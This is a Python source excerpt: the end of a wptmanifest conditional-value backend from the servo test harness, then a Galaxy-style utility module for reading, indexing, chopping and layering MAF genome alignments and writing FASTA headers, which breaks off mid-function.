                        #run_info simply does not match
                        matches = False
                    if matches:
                        return cond_value.value
        raise KeyError

    def set(self, key, value, condition=None):
        """Set key to value under the optional condition node, updating an
        existing matching conditional value when one exists."""
        # First try to update the existing value
        if key in self._data:
            cond_values = self._data[key]
            for cond_value in cond_values:
                if cond_value.condition_node == condition:
                    cond_value.value = value
                    return

        # If there isn't a conditional match reuse the existing KeyValueNode as the
        # parent
        node = None
        for child in self.node.children:
            if child.data == key:
                node = child
                break
        # BUGFIX: an assert previously sat inside the loop and fired whenever
        # the first child did not match the key; only create a new
        # KeyValueNode when no child matched at all.
        if node is None:
            node = KeyValueNode(key)
            self.node.append(node)

        value_node = ValueNode(value)
        if condition is not None:
            conditional_node = ConditionalNode()
            conditional_node.append(condition)
            conditional_node.append(value_node)
            node.append(conditional_node)
            cond_value = Compiler().compile_condition(conditional_node)
        else:
            node.append(value_node)
            cond_value = ConditionalValue(value_node, lambda x: True)

        # Update the cache of child values. This is pretty annoying and maybe
        # it should just work directly on the tree
        if key not in self._data:
            self._data[key] = []
        if self._data[key] and self._data[key][-1].condition_node is None:
            #keep the unconditional default as the last entry
            self._data[key].insert(len(self._data[key]) - 1, cond_value)
        else:
            self._data[key].append(cond_value)

    def _add_key_value(self, node, values):
        """Called during construction to set a key-value node"""
        self._data[node.data] = values

    def append(self, child):
        """Attach child as a sub-item, also linking the underlying AST nodes
        when they are not already connected."""
        self.children.append(child)
        child.parent = self
        if child.node.parent != self.node:
            self.node.append(child.node)
        return child

    def remove(self):
        if self.parent:
            self.parent._remove_child(self)

    def _remove_child(self, child):
        self.children.remove(child)
        child.parent = None

    def iterchildren(self, name=None):
        """Yield children, optionally restricted to those named name."""
        for item in self.children:
            if item.name == name or name is None:
                yield item

    def _flatten(self):
        #merge this node's data with root-level defaults; local keys win
        rv = {}
        for node in [self, self.root]:
            for name, value in node._data.iteritems():
                if name not in rv:
                    rv[name] = value
        return rv

    def iteritems(self):
        for item in self._flatten().iteritems():
            yield item

    def iterkeys(self):
        for item in self._flatten().iterkeys():
            yield item

    def remove_value(self, key, value):
        """Remove a ConditionalValue from key, dropping the key (and the
        value's AST nodes) when it becomes empty."""
        self._data[key].remove(value)
        if not self._data[key]:
            del self._data[key]
        value.remove()
def compile_ast(ast, data_cls_getter=None, **kwargs):
    """Compile a wptmanifest AST into a tree of output items."""
    compiler = Compiler()
    return compiler.compile(ast, data_cls_getter=data_cls_getter, **kwargs)
def compile(stream, data_cls_getter=None, **kwargs):
    """Parse a wptmanifest stream and compile the resulting AST."""
    ast = parse(stream)
    return compile_ast(ast, data_cls_getter=data_cls_getter, **kwargs)
| zhangjunlei26/servo | tests/wpt/harness/wptrunner/wptmanifest/backends/conditional.py | Python | mpl-2.0 | 10,439 | [
"VisIt"
] | d39a2da1de01136de6d98bf1f61362684a19a919bae5e2233ae92e20b3c595c5 |
#!/usr/bin/env python
"""
Provides wrappers and utilities for working with MAF files and alignments.
"""
#Dan Blankenberg
import pkg_resources; pkg_resources.require( "bx-python" )
import bx.align.maf
import bx.intervals
import bx.interval_index_file
import sys, os, string, tempfile
import logging
from errno import EMFILE
import resource
from copy import deepcopy
assert sys.version_info[:2] >= ( 2, 4 )
log = logging.getLogger(__name__)
GAP_CHARS = [ '-' ]
SRC_SPLIT_CHAR = '.'
def src_split( src ):
    """Split a MAF src string into ( species, chromosome ).

    Splits on the first separator only, so "hg18.chr1_random.2" keeps the
    tail in the chromosome part; when no separator is present the species
    name is used for both fields.
    """
    parts = src.split( SRC_SPLIT_CHAR, 1 )
    if len( parts ) == 2:
        return parts[0], parts[1]
    #no chromosome component present
    return parts[0], parts[0]
def src_merge( spec, chrom, contig = None ):
    """Merge species/chromosome (and optional contig) back into a MAF src
    string; a missing half is filled from whichever part is present."""
    if spec is None or chrom is None:
        spec = chrom = spec or chrom
    return bx.align.maf.src_merge( spec, chrom, contig )
def get_species_in_block( block ):
    """Return unique species names present in block, in first-seen order."""
    seen = []
    for comp in block.components:
        spec = src_split( comp.src )[0]
        if spec not in seen:
            seen.append( spec )
    return seen
def tool_fail( msg = "Unknown Error" ):
    """Print a fatal error message to stderr and terminate the tool.

    Uses sys.stderr.write instead of the python-2-only ``print >>``
    statement so the function is valid under both python 2 and 3.
    """
    sys.stderr.write( "Fatal Error: %s\n" % msg )
    #NOTE(review): exits with status 0; callers appear to detect failure via
    #stderr output rather than the exit code -- confirm before changing
    sys.exit()
class TempFileHandler( object ):
    '''
    Handles creating, opening, closing, and deleting of Temp files, with a
    maximum number of files open at one time.
    '''

    #default: half the process's soft file-descriptor limit, at least 1
    DEFAULT_MAX_OPEN_FILES = max( resource.getrlimit( resource.RLIMIT_NOFILE )[0] / 2, 1 )

    def __init__( self, max_open_files=None, **kwds ):
        #kwds are forwarded to tempfile.NamedTemporaryFile when creating files
        if max_open_files is None:
            max_open_files = self.DEFAULT_MAX_OPEN_FILES
        self.max_open_files = max_open_files
        self.files = []                #every tempfile ever created, open or closed
        self.open_file_indexes = []    #indexes of currently open files, oldest first
        self.kwds = kwds

    def get_open_tempfile( self, index=None, **kwds ):
        """Return ( index, file object ) for an open temp file positioned at
        EOF; creates a new file when index is None, reopening closed files
        and evicting the oldest open ones to respect max_open_files."""
        if index is not None and index in self.open_file_indexes:
            #already open: just refresh its position in the LRU list below
            self.open_file_indexes.remove( index )
        else:
            if self.max_open_files:
                #evict oldest open files until we are under the limit
                while len( self.open_file_indexes ) >= self.max_open_files:
                    self.close( self.open_file_indexes[0] )
            if index is None:
                index = len( self.files )
                temp_kwds = dict( self.kwds )
                temp_kwds.update( kwds )
                # Being able to use delete=True here, would simplify a bit,
                # but we support python2.4 in these tools
                while True:
                    try:
                        tmp_file = tempfile.NamedTemporaryFile( **temp_kwds )
                        filename = tmp_file.name
                        break
                    except OSError, e:
                        #hit the fd limit (EMFILE): shrink our allowance,
                        #evict the oldest open file and retry
                        if self.open_file_indexes and e.errno == EMFILE:
                            self.max_open_files = len( self.open_file_indexes )
                            self.close( self.open_file_indexes[0] )
                        else:
                            raise e
                tmp_file.close()
                #reopen by name so the file persists after NamedTemporaryFile closes
                self.files.append( open( filename, 'w+b' ) )
            else:
                #reopen a previously closed tempfile by its stored name
                while True:
                    try:
                        self.files[ index ] = open( self.files[ index ].name, 'r+b' )
                        break
                    except OSError, e:
                        if self.open_file_indexes and e.errno == EMFILE:
                            self.max_open_files = len( self.open_file_indexes )
                            self.close( self.open_file_indexes[0] )
                        else:
                            raise e
                #position at EOF so callers can append
                self.files[ index ].seek( 0, 2 )
        self.open_file_indexes.append( index )
        return index, self.files[ index ]

    def close( self, index, delete=False ):
        """Close the file at index; optionally unlink it from disk."""
        if index in self.open_file_indexes:
            self.open_file_indexes.remove( index )
        rval = self.files[ index ].close()
        if delete:
            try:
                os.unlink( self.files[ index ].name )
            except OSError:
                pass
        return rval

    def flush( self, index ):
        #flushing only applies while the file is open
        if index in self.open_file_indexes:
            self.files[ index ].flush()

    def __del__( self ):
        #close and delete every tempfile when the handler is collected
        for i in xrange( len( self.files ) ):
            self.close( i, delete=True )
#an object corresponding to a reference layered alignment
class RegionAlignment( object ):
    """Tempfile-backed alignment of fixed length ``size``: one
    gap-initialized sequence per species, writable at arbitrary offsets."""

    DNA_COMPLEMENT = string.maketrans( "ACGTacgt", "TGCAtgca" )
    MAX_SEQUENCE_SIZE = sys.maxint #Maximum length of sequence allowed

    def __init__( self, size, species = [], temp_file_handler = None ):
        #NOTE(review): the mutable default [] is only read, never mutated
        assert size <= self.MAX_SEQUENCE_SIZE, "Maximum length allowed for an individual sequence has been exceeded (%i > %i)." % ( size, self.MAX_SEQUENCE_SIZE )
        self.size = size
        if not temp_file_handler:
            temp_file_handler = TempFileHandler()
        self.temp_file_handler = temp_file_handler
        #species name -> tempfile index in temp_file_handler
        self.sequences = {}
        if not isinstance( species, list ):
            species = [species]
        for spec in species:
            self.add_species( spec )

    #add a species to the alignment
    def add_species( self, species ):
        #make temporary sequence files; the sequence starts as all gaps
        file_index, fh = self.temp_file_handler.get_open_tempfile()
        self.sequences[species] = file_index
        fh.write( "-" * self.size )

    #returns the names for species found in alignment, skipping names as requested
    def get_species_names( self, skip = [] ):
        if not isinstance( skip, list ): skip = [skip]
        names = self.sequences.keys()
        for name in skip:
            try: names.remove( name )
            except: pass
        return names

    #returns the sequence for a species
    def get_sequence( self, species ):
        file_index, fh = self.temp_file_handler.get_open_tempfile( self.sequences[species] )
        fh.seek( 0 )
        return fh.read()

    #returns the reverse complement of the sequence for a species
    def get_sequence_reverse_complement( self, species ):
        complement = [base for base in self.get_sequence( species ).translate( self.DNA_COMPLEMENT )]
        complement.reverse()
        return "".join( complement )

    #sets a position for a species
    def set_position( self, index, species, base ):
        if len( base ) != 1: raise Exception( "A genomic position can only have a length of 1." )
        return self.set_range( index, species, base )

    #sets a range for a species
    def set_range( self, index, species, bases ):
        """Overwrite len(bases) characters at offset index for species,
        adding the species on first write."""
        if index >= self.size or index < 0: raise Exception( "Your index (%i) is out of range (0 - %i)." % ( index, self.size - 1 ) )
        if len( bases ) == 0: raise Exception( "A set of genomic positions can only have a positive length." )
        if species not in self.sequences.keys(): self.add_species( species )
        file_index, fh = self.temp_file_handler.get_open_tempfile( self.sequences[species] )
        fh.seek( index )
        fh.write( bases )

    #Flush temp file of specified species, or all species
    def flush( self, species = None ):
        if species is None:
            species = self.sequences.keys()
        elif not isinstance( species, list ):
            species = [species]
        for spec in species:
            self.temp_file_handler.flush( self.sequences[spec] )
class GenomicRegionAlignment( RegionAlignment ):
    """RegionAlignment anchored to absolute genomic coordinates [start, end)."""
    def __init__( self, start, end, species = [], temp_file_handler = None ):
        #the alignment length equals the genomic span
        self.start = start
        self.end = end
        RegionAlignment.__init__( self, end - start, species, temp_file_handler=temp_file_handler )
class SplicedAlignment( object ):
    """Alignment over a list of exons; each exon is a GenomicRegionAlignment
    and per-species sequences are spliced together in exon order."""

    DNA_COMPLEMENT = string.maketrans( "ACGTacgt", "TGCAtgca" )

    def __init__( self, exon_starts, exon_ends, species = [], temp_file_handler = None ):
        if not isinstance( exon_starts, list ):
            exon_starts = [exon_starts]
        if not isinstance( exon_ends, list ):
            exon_ends = [exon_ends]
        assert len( exon_starts ) == len( exon_ends ), "The number of starts does not match the number of sizes."
        self.exons = []
        if not temp_file_handler:
            temp_file_handler = TempFileHandler()
        self.temp_file_handler = temp_file_handler
        for i in range( len( exon_starts ) ):
            self.exons.append( GenomicRegionAlignment( exon_starts[i], exon_ends[i], species, temp_file_handler=temp_file_handler ) )

    #returns the names for species found in alignment, skipping names as requested
    def get_species_names( self, skip = [] ):
        if not isinstance( skip, list ): skip = [skip]
        names = []
        for exon in self.exons:
            for name in exon.get_species_names( skip = skip ):
                if name not in names:
                    names.append( name )
        return names

    #returns the sequence for a species
    def get_sequence( self, species ):
        """Splice the species' exon sequences together, padding exons where
        the species is absent with gaps."""
        #build the spliced sequence in a scratch tempfile, then read it back
        index, fh = self.temp_file_handler.get_open_tempfile()
        for exon in self.exons:
            if species in exon.get_species_names():
                seq = exon.get_sequence( species )
                # we need to refetch fh here, since exon.get_sequence( species ) uses a tempfile
                # and if max==1, it would close fh
                index, fh = self.temp_file_handler.get_open_tempfile( index )
                fh.write( seq )
            else:
                #species absent from this exon: pad with gaps
                fh.write( "-" * exon.size )
        fh.seek( 0 )
        rval = fh.read()
        self.temp_file_handler.close( index, delete=True )
        return rval

    #returns the reverse complement of the sequence for a species
    def get_sequence_reverse_complement( self, species ):
        complement = [base for base in self.get_sequence( species ).translate( self.DNA_COMPLEMENT )]
        complement.reverse()
        return "".join( complement )

    #Start and end of coding region
    @property
    def start( self ):
        return self.exons[0].start

    @property
    def end( self ):
        return self.exons[-1].end
#Open a MAF index using a UID
def maf_index_by_uid( maf_uid, index_location_file ):
    """Look up maf_uid in a tab-separated .loc file and return a bx
    MultiIndexed over its MAF files, or None when the UID is not found."""
    for line in open( index_location_file ):
        try:
            #read each line, if not enough fields, go to next line
            if line[0:1] == "#" : continue
            fields = line.split('\t')
            if maf_uid == fields[1]:
                try:
                    #column 4 is a comma-separated list of MAF file paths
                    maf_files = fields[4].replace( "\n", "" ).replace( "\r", "" ).split( "," )
                    return bx.align.maf.MultiIndexed( maf_files, keep_open = True, parse_e_rows = False )
                except Exception, e:
                    raise Exception( 'MAF UID (%s) found, but configuration appears to be malformed: %s' % ( maf_uid, e ) )
        except:
            #NOTE(review): this bare except also swallows the "malformed
            #configuration" Exception raised just above, so that error can
            #never propagate -- confirm whether that is intended
            pass
    return None
#return ( index, temp_index_filename ) for user maf, if available, or build one and return it, return None when no tempfile is created
def open_or_build_maf_index( maf_file, index_filename, species = None ):
    """Open an existing MAF index or, failing that, build a temporary one.

    Returns ( index, temp_index_filename ): temp_index_filename is None when
    the existing index was usable, otherwise it names a freshly built
    tempfile the caller must clean up; ( None, None ) when indexing fails.
    """
    try:
        return ( bx.align.maf.Indexed( maf_file, index_filename = index_filename, keep_open = True, parse_e_rows = False ), None )
    except Exception:
        #existing index is missing or unreadable: fall back to building one
        #(narrowed from a bare except so KeyboardInterrupt/SystemExit pass through)
        return build_maf_index( maf_file, species = species )
def build_maf_index_species_chromosomes( filename, index_species = None ):
    """Scan a MAF file and build an interval index of its components.

    Returns ( indexes, species, species_chromosomes, blocks ) where indexes
    is a bx Indexes object keyed by component src, species is the list of
    species seen, species_chromosomes maps species to their chromosomes and
    blocks is the block count. Returns ( None, [], {}, 0 ) on any error.
    Only species listed in index_species are indexed (all when None).
    """
    species = []
    species_chromosomes = {}
    indexes = bx.interval_index_file.Indexes()
    blocks = 0
    try:
        maf_reader = bx.align.maf.Reader( open( filename ) )
        while True:
            #record the file offset of the block so it can be indexed
            pos = maf_reader.file.tell()
            block = maf_reader.next()
            if block is None:
                break
            blocks += 1
            for c in block.components:
                spec = c.src
                chrom = None
                if "." in spec:
                    spec, chrom = spec.split( ".", 1 )
                if spec not in species:
                    species.append( spec )
                    species_chromosomes[spec] = []
                if chrom and chrom not in species_chromosomes[spec]:
                    species_chromosomes[spec].append( chrom )
                if index_species is None or spec in index_species:
                    forward_strand_start = c.forward_strand_start
                    forward_strand_end = c.forward_strand_end
                    try:
                        forward_strand_start = int( forward_strand_start )
                        forward_strand_end = int( forward_strand_end )
                    except ValueError:
                        continue #start and end are not integers, can't add component to index, goto next component
                        #this likely only occurs when parse_e_rows is True?
                        #could a species exist as only e rows? should the
                    if forward_strand_end > forward_strand_start:
                        #require positive length; i.e. certain lines have start = end = 0 and cannot be indexed
                        indexes.add( c.src, forward_strand_start, forward_strand_end, pos, max=c.src_size )
    except Exception, e:
        #most likely a bad MAF
        log.debug( 'Building MAF index on %s failed: %s' % ( filename, e ) )
        return ( None, [], {}, 0 )
    return ( indexes, species, species_chromosomes, blocks )
#builds and returns ( index, index_filename ) for specified maf_file
def build_maf_index( maf_file, species = None ):
    """Index maf_file (optionally restricted to species) into a temporary
    index file; returns ( bx Indexed, index_filename ) or ( None, None )."""
    scan_result = build_maf_index_species_chromosomes( maf_file, species )
    indexes = scan_result[0]
    if indexes is None:
        return ( None, None )
    #persist the index to a named tempfile the caller is responsible for
    fd, index_filename = tempfile.mkstemp()
    out = os.fdopen( fd, 'w' )
    indexes.write( out )
    out.close()
    return ( bx.align.maf.Indexed( maf_file, index_filename = index_filename, keep_open = True, parse_e_rows = False ), index_filename )
def component_overlaps_region( c, region ):
    """Return True when component c covers at least one forward-strand
    position inside region; a None component never overlaps."""
    if c is None:
        return False
    comp_start = c.get_forward_strand_start()
    comp_end = c.get_forward_strand_end()
    #half-open interval intersection test
    return comp_start < region.end and region.start < comp_end
def chop_block_by_region( block, src, region, species = None, mincols = 0 ):
    """Slice block down to the alignment columns overlapping region on the
    components matching src.

    Returns the chopped block (optionally limited to species, with all-gap
    columns removed and the original score restored), or None when nothing
    longer than mincols remains.
    """
    # This chopping method was designed to maintain consistency with how start/end padding gaps have been working in Galaxy thus far:
    # behavior as seen when forcing blocks to be '+' relative to src sequence (ref) and using block.slice_by_component( ref, slice_start, slice_end )
    # whether-or-not this is the 'correct' behavior is questionable, but this will at least maintain consistency
    # comments welcome
    slice_start = block.text_size #max for the min()
    slice_end = 0 #min for the max()
    old_score = block.score #save old score for later use
    # We no longer assume only one occurance of src per block, so we need to check them all
    for c in iter_components_by_src( block, src ):
        if component_overlaps_region( c, region ):
            if c.text is not None:
                rev_strand = False
                if c.strand == "-":
                    #We want our coord_to_col coordinates to be returned from positive stranded component
                    rev_strand = True
                    c = c.reverse_complement()
                start = max( region.start, c.start )
                end = min( region.end, c.end )
                start = c.coord_to_col( start )
                end = c.coord_to_col( end )
                if rev_strand:
                    #need to orient slice coordinates to the original block direction
                    slice_len = end - start
                    end = len( c.text ) - start
                    start = end - slice_len
                #grow the slice to cover every matching component's overlap
                slice_start = min( start, slice_start )
                slice_end = max( end, slice_end )
    if slice_start < slice_end:
        block = block.slice( slice_start, slice_end )
        if block.text_size > mincols:
            # restore old score, may not be accurate, but it is better than 0 for everything?
            block.score = old_score
            if species is not None:
                block = block.limit_to_species( species )
            block.remove_all_gap_columns()
            return block
    return None
def orient_block_by_region( block, src, region, force_strand = None ):
    """Return block, reverse-complemented when none of the src components
    overlapping region lie on the desired strand (region.strand, or
    force_strand when given)."""
    #loop through components matching src,
    #make sure each of these components overlap region
    #cache strand for each of overlaping regions
    #if force_strand / region.strand not in strand cache, reverse complement
    ### we could have 2 sequences with same src, overlapping region, on different strands, this would cause no reverse_complementing
    strands = [ c.strand for c in iter_components_by_src( block, src ) if component_overlaps_region( c, region ) ]
    #NOTE(review): 'and' binds tighter than 'or', so the 'strands and' guard
    #applies only to the first clause; with force_strand set and no
    #overlapping components, the block is still reverse-complemented --
    #confirm this is intended before adding parentheses
    if strands and ( force_strand is None and region.strand not in strands ) or ( force_strand is not None and force_strand not in strands ):
        block = block.reverse_complement()
    return block
def get_oriented_chopped_blocks_for_region( index, src, region, species = None, mincols = 0, force_strand = None ):
    """Yield only the oriented, chopped blocks for region, discarding the
    accompanying index/offset values."""
    for block, _idx, _offset in get_oriented_chopped_blocks_with_index_offset_for_region( index, src, region, species, mincols, force_strand ):
        yield block
def get_oriented_chopped_blocks_with_index_offset_for_region( index, src, region, species = None, mincols = 0, force_strand = None ):
    """Yield ( oriented block, index, offset ) for every chopped block
    overlapping region."""
    triples = get_chopped_blocks_with_index_offset_for_region( index, src, region, species, mincols )
    for block, idx, offset in triples:
        oriented = orient_block_by_region( block, src, region, force_strand )
        yield oriented, idx, offset
#split a block with multiple occurances of src into one block per src
def iter_blocks_split_by_src( block, src ):
    """Yield one copy of block per component whose src matches: each copy
    contains that single matching component plus every non-src component."""
    for src_c in iter_components_by_src( block, src ):
        new_block = bx.align.Alignment( score=block.score, attributes=deepcopy( block.attributes ) )
        new_block.text_size = block.text_size
        for c in block.components:
            #keep the chosen src component and everything with a different src
            if c == src_c or c.src != src:
                new_block.add_component( deepcopy( c ) ) #components have reference to alignment, dont want to loose reference to original alignment block in original components
        yield new_block
#split a block into multiple blocks with all combinations of a species appearing only once per block
def iter_blocks_split_by_species( block, species = None ):
    """Yield copies of block for every combination in which each species
    contributes exactly one of its components (component order restored)."""
    def __split_components_by_species( components_by_species, new_block ):
        #recursively build blocks: pick one component for the first species,
        #then recurse over the remaining species
        if components_by_species:
            #more species with components to add to this block
            components_by_species = deepcopy( components_by_species )
            spec_comps = components_by_species.pop( 0 )
            for c in spec_comps:
                newer_block = deepcopy( new_block )
                newer_block.add_component( deepcopy( c ) )
                for value in __split_components_by_species( components_by_species, newer_block ):
                    yield value
        else:
            #no more components to add, yield this block
            yield new_block

    #divide components by species
    spec_dict = {}
    if not species:
        species = []
        for c in block.components:
            spec, chrom = src_split( c.src )
            if spec not in spec_dict:
                spec_dict[ spec ] = []
                species.append( spec )
            spec_dict[ spec ].append( c )
    else:
        for spec in species:
            spec_dict[ spec ] = []
            for c in iter_components_by_src_start( block, spec ):
                spec_dict[ spec ].append( c )

    empty_block = bx.align.Alignment( score=block.score, attributes=deepcopy( block.attributes ) ) #should we copy attributes?
    empty_block.text_size = block.text_size

    #call recursive function to split into each combo of spec/blocks
    #NOTE: .values() returns a list under python 2, which the recursion pops
    for value in __split_components_by_species( spec_dict.values(), empty_block ):
        sort_block_components_by_block( value, block ) #restore original component order
        yield value
#generator yielding only chopped and valid blocks for a specified region
def get_chopped_blocks_for_region( index, src, region, species = None, mincols = 0 ):
    """Yield only the valid chopped blocks for region, without index/offset."""
    for block, _idx, _offset in get_chopped_blocks_with_index_offset_for_region( index, src, region, species, mincols ):
        yield block
def get_chopped_blocks_with_index_offset_for_region( index, src, region, species = None, mincols = 0 ):
    """Yield ( chopped block, index, offset ) for indexed blocks overlapping
    region, skipping blocks that chop away entirely."""
    for block, idx, offset in index.get_as_iterator_with_index_and_offset( src, region.start, region.end ):
        chopped = chop_block_by_region( block, src, region, species, mincols )
        if chopped is None:
            continue
        yield chopped, idx, offset
#returns a filled region alignment for specified regions
def get_region_alignment( index, primary_species, chrom, start, end, strand = '+', species = None, mincols = 0, overwrite_with_gaps = True, temp_file_handler = None ):
    """Create a RegionAlignment for chrom:start-end and fill it from the
    MAF index; species=None restricts the alignment to the primary species
    but leaves block filtering unrestricted."""
    if species is not None:
        alignment = RegionAlignment( end - start, species, temp_file_handler=temp_file_handler )
    else:
        alignment = RegionAlignment( end - start, primary_species, temp_file_handler=temp_file_handler )
    return fill_region_alignment( alignment, index, primary_species, chrom, start, end, strand, species, mincols, overwrite_with_gaps )
#reduces a block to only positions exisiting in the src provided
def reduce_block_by_primary_genome( block, species, chromosome, region_start ):
    """Return ( start_offset, {species: text} ) with every column that is a
    gap in the primary species removed from all species' texts; start_offset
    is the primary component's start relative to region_start."""
    #returns ( startIndex, {species:texts}
    #where texts' contents are reduced to only positions existing in the primary genome
    src = "%s.%s" % ( species, chromosome )
    ref = block.get_component_by_src( src )
    start_offset = ref.start - region_start
    species_texts = {}
    for c in block.components:
        species_texts[ c.src.split( '.' )[0] ] = list( c.text )
    #remove locations which are gaps in the primary species, starting from the downstream end
    for i in range( len( species_texts[ species ] ) - 1, -1, -1 ):
        if species_texts[ species ][i] == '-':
            for text in species_texts.values():
                text.pop( i )
    #re-join the per-character lists into strings
    for spec, text in species_texts.items():
        species_texts[spec] = ''.join( text )
    return ( start_offset, species_texts )
#fills a region alignment
def fill_region_alignment( alignment, index, primary_species, chrom, start, end, strand = '+', species = None, mincols = 0, overwrite_with_gaps = True ):
    """Layer MAF blocks overlapping chrom:start-end into alignment.

    Blocks are applied lowest-score first so higher-scoring blocks win any
    conflicts. When overwrite_with_gaps is False, gap characters never
    overwrite previously written bases.
    """
    region = bx.intervals.Interval( start, end )
    region.chrom = chrom
    region.strand = strand
    primary_src = "%s.%s" % ( primary_species, chrom )

    #Order blocks overlaping this position by score, lowest first
    blocks = []
    for block, idx, offset in index.get_as_iterator_with_index_and_offset( primary_src, start, end ):
        score = float( block.score )
        for i in range( 0, len( blocks ) ):
            if score < blocks[i][0]:
                #insertion sort by ascending score
                blocks.insert( i, ( score, idx, offset ) )
                break
        else:
            blocks.append( ( score, idx, offset ) )

    #gap_chars_tuple = tuple( GAP_CHARS )
    gap_chars_str = ''.join( GAP_CHARS )
    #Loop through ordered blocks and layer by increasing score
    for block_dict in blocks:
        for block in iter_blocks_split_by_species( block_dict[1].get_at_offset( block_dict[2] ) ): #need to handle each occurance of sequence in block seperately
            if component_overlaps_region( block.get_component_by_src( primary_src ), region ):
                block = chop_block_by_region( block, primary_src, region, species, mincols ) #chop block
                block = orient_block_by_region( block, primary_src, region ) #orient block
                start_offset, species_texts = reduce_block_by_primary_genome( block, primary_species, chrom, start )
                for spec, text in species_texts.items():
                    #we should trim gaps from both sides, since these are not positions in this species genome (sequence)
                    text = text.rstrip( gap_chars_str )
                    gap_offset = 0
                    while True in [ text.startswith( gap_char ) for gap_char in GAP_CHARS ]: #python2.4 doesn't accept a tuple for .startswith()
                        #while text.startswith( gap_chars_tuple ):
                        gap_offset += 1
                        text = text[1:]
                        if not text:
                            break
                    if text:
                        if overwrite_with_gaps:
                            alignment.set_range( start_offset + gap_offset, spec, text )
                        else:
                            #write base-by-base, skipping gap characters so
                            #they don't clobber previously layered bases
                            for i, char in enumerate( text ):
                                if char not in GAP_CHARS:
                                    alignment.set_position( start_offset + gap_offset + i, spec, char )
    return alignment
#returns a filled spliced region alignment for specified region with start and end lists
def get_spliced_region_alignment( index, primary_species, chrom, starts, ends, strand = '+', species = None, mincols = 0, overwrite_with_gaps = True, temp_file_handler = None ):
    """Create a SplicedAlignment over the given exon starts/ends and fill
    each exon from the MAF index."""
    #create spliced alignment object
    if species is not None:
        alignment = SplicedAlignment( starts, ends, species, temp_file_handler=temp_file_handler )
    else:
        alignment = SplicedAlignment( starts, ends, [primary_species], temp_file_handler=temp_file_handler )
    for exon in alignment.exons:
        fill_region_alignment( exon, index, primary_species, chrom, exon.start, exon.end, strand, species, mincols, overwrite_with_gaps )
    return alignment
#loop through string array, only return non-commented lines
def line_enumerator( lines, comment_start = '#' ):
    """Yield ( count, line ) pairs for non-comment lines, counting only the
    lines actually yielded (1-based)."""
    count = 0
    for line in lines:
        if line.startswith( comment_start ):
            continue
        count += 1
        yield ( count, line )
#read a GeneBed file, return list of starts, ends, raw fields
def get_starts_ends_fields_from_gene_bed( line ):
    """Parse one 12-column (gene) BED line.

    Returns ( starts, ends, fields ): starts/ends are the coding-exon
    intervals clipped to [cdsStart, cdsEnd), and fields is the raw column
    list. Raises Exception when fewer than 12 columns are present.
    """
    #Starts and ends for exons
    starts = []
    ends = []
    fields = line.split()
    #Requires atleast 12 BED columns
    if len( fields ) < 12:
        raise Exception( "Not a proper 12 column BED line (%s)." % line )
    tx_start = int( fields[1] )
    cds_start = int( fields[6] )
    cds_end = int( fields[7] )
    #Calculate and store starts and ends of coding exons
    region_start, region_end = cds_start, cds_end
    #list comprehensions instead of map(): under python 3 the map() iterators
    #were consumed by the first use, leaving zip() with nothing to pair and
    #silently producing empty results
    exon_starts = [ int( x ) + tx_start for x in fields[11].rstrip( ',\n' ).split( ',' ) ]
    exon_sizes = [ int( x ) for x in fields[10].rstrip( ',' ).split( ',' ) ]
    exon_ends = [ exon_start + size for exon_start, size in zip( exon_starts, exon_sizes ) ]
    #clip each exon to the coding region; drop exons entirely outside it
    for start, end in zip( exon_starts, exon_ends ):
        start = max( start, region_start )
        end = min( end, region_end )
        if start < end:
            starts.append( start )
            ends.append( end )
    return ( starts, ends, fields )
def iter_components_by_src( block, src ):
    """Yield every component of block whose src matches exactly."""
    matches = ( comp for comp in block.components if comp.src == src )
    for comp in matches:
        yield comp
def get_components_by_src( block, src ):
    """Return a list of all components whose src matches exactly."""
    return list( iter_components_by_src( block, src ) )
def iter_components_by_src_start( block, src ):
    """Yield every component of block whose src begins with the given prefix."""
    for comp in block.components:
        if not comp.src.startswith( src ):
            continue
        yield comp
def get_components_by_src_start( block, src ):
    """Return a list of all components whose src begins with the given prefix."""
    return list( iter_components_by_src_start( block, src ) )
def sort_block_components_by_block( block1, block2 ):
    """Order block1's components by their index within block2's components.

    block1's components must be a subset of block2's; the sort happens
    in-place and, like list.sort, the call returns None.
    """
    #key-based sort works under both python 2 and 3 (the cmp= parameter was
    #removed in python 3) and avoids the comparator's double index() lookups
    return block1.components.sort( key = block2.components.index )
def get_species_in_maf( maf_filename ):
    """Return unique species names across all blocks of a MAF file, in
    first-seen order."""
    found = []
    for block in bx.align.maf.Reader( open( maf_filename ) ):
        for spec in get_species_in_block( block ):
            if spec not in found:
                found.append( spec )
    return found
def parse_species_option( species ):
    """Parse a comma-separated species option string into a list.

    Returns None for '', None, or any value containing the literal token
    'None' (meaning "all species")."""
    if not species:
        return None
    names = species.split( ',' )
    if 'None' in names:
        return None
    return names
def remove_temp_index_file( index_filename ):
    """Best-effort deletion of a temporary index file.

    Filesystem errors (missing file, permissions) are ignored.  The bare
    ``except`` was narrowed to OSError so unrelated bugs (e.g. passing a
    non-path object) are no longer silently swallowed.
    """
    try:
        os.unlink( index_filename )
    except OSError:
        pass
#Below are methods to deal with FASTA files
def get_fasta_header( component, attributes = None, suffix = None ):
    """Build a FASTA header line for an alignment component.

    Format: ``>src(strand):start-end|key=value|...|suffix`` using forward
    strand coordinates.  When *suffix* is falsy, the species name (first
    piece of the dotted src, via src_split) is appended instead.

    Fixes: the shared mutable default ``attributes={}`` is now a None
    sentinel (same behavior for all callers), and the Python-2-only
    ``iteritems()`` became ``items()`` (works on 2 and 3).
    """
    if attributes is None:
        attributes = {}
    header = ">%s(%s):%i-%i|" % ( component.src, component.strand, component.get_forward_strand_start(), component.get_forward_strand_end() )
    for key, value in attributes.items():
        header = "%s%s=%s|" % ( header, key, value )
    if suffix:
        header = "%s%s" % ( header, suffix )
    else:
        header = "%s%s" % ( header, src_split( component.src )[ 0 ] )
    return header
def get_attributes_from_fasta_header( header ):
    """Parse a header produced by get_fasta_header back into a dict.

    Pipe-delimited fields:
      * field 0: ``src(strand):start-end`` region; yields 'species',
        'chrom', 'strand', 'start' (int), 'end' (int).  'species'/'chrom'
        come from splitting src on the first '.'; with no '.', both get
        the whole src.  A field 0 that is not a region coordinate is
        skipped (any keys set before the parse failed are kept, as before).
      * middle fields: ``key=value`` pairs stored verbatim.
      * last field (when more than one): stored under '__suffix__'.

    Returns {} for an empty/None header.  Fixes: bare ``except`` narrowed
    to the two errors region parsing can raise; Python-2-only ``xrange``
    loop replaced by an equivalent slice.
    """
    if not header:
        return {}
    attributes = {}
    header = header.lstrip( '>' ).strip()
    fields = header.split( '|' )
    try:
        region = fields[0].split( '(', 1 )
        temp = region[0].split( '.', 1 )
        attributes['species'] = temp[0]
